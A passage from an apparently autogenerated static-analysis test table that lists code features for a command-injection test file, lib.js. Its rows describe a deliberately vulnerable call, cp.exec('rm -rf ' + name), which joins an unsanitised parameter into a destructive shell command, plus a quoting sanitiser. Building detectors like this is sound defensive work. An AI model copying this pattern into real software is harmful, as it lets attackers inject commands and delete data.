name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:3 | cp | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:3 | cp | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:8 | cp.exec | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | cp.exec ... + name) | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:5:236:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:5:236:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:5:236:8 | exec | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:5:236:8 | exec | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:5:236:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:18 | "rm -rf " | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:10:236:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:22:236:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:22:236:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:22:236:25 | name | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:22:236:25 | name | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:22:236:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:22:236:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:239:14 | cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:239:14 | cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:239:14 | cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:239:14 | cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:246:1 | cleanIn ... rn s;\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:246:1 | cleanIn ... rn s;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:246:1 | cleanIn ... rn s;\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:246:1 | cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:246:1 | cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:5:246:1 | cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:239:17 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:239:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:239:17 | this | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:239:17 | this | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:239:17 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | 'arguments' object of function cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | 'arguments' object of function cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | 'arguments' object of function cleanInput | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | 'arguments' object of function cleanInput | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | 'arguments' object of function cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | exceptional return of function cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | exceptional return of function cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | exceptional return of function cleanInput | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | exceptional return of function cleanInput | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | exceptional return of function cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | functio ... rn s;\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | functio ... rn s;\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | functio ... rn s;\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | return of function cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 